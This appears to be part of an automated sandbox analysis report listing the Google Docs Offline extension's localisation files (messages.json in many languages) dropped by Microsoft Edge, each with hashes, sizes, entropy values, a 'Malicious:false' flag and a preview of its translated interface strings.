                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                    Download File
